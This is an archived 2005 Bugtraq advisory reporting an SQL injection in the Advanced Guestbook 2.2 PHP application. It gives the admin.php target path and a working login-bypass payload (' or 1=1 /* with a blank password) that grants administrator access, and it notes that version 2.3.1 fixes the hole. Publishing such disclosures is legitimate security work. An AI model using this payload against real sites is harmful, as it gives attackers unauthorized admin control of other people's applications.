Advanced Guestbook 2.2 ( SQL Injection Exploit )

bhs_team_at_yahoo.com
Date: 11/06/05

  • Next message: trueend5_at_yahoo.com: "Re: Re: Mambo Open Source, Path disclosure"
    Date: 6 Nov 2005 19:03:12 -0000
    To: bugtraq@securityfocus.com
    
    
    ('binary' encoding is not supported, stored as-is) Guestbook 2.2 webapplication (PHP, MySQL) appears vulnerable to SQL Injection granting the attacker administrator access.

    Target :

    http://www.example.com/[GuestbookTarget]/admin.php

    Username: ' or 1=1 /*
    Password: (Nothing)(Blank)

    It`s Working On Advanced Guestbook 2.2 version 2.3.1 will fix this vulnerability.

    Report By : POPO ( Pooya )
    From www.Babol-Hackers.com
    bhs_team@yahoo.com
    Y! ID : bhs_team , pooya_0nline
    -----------------------------------
    BHS-Team

    We Are : POPO + Padeshah + Black ICE + Ezraeil + UNDERTAKER + Fa0p


  • Next message: trueend5_at_yahoo.com: "Re: Re: Mambo Open Source, Path disclosure"

    Relevant Pages